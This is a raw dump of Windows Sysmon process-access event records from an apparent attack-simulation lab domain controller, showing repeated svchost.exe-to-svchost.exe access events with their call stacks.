13:29:59.498{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010858Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.498{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010857Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.498{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010856Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.498{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010855Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.498{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010854Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010853Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010852Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010851Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010850Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010849Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010848Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010847Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010846Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010845Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010844Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010843Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010842Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010841Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010840Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010839Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010838Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010837Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010836Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010835Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 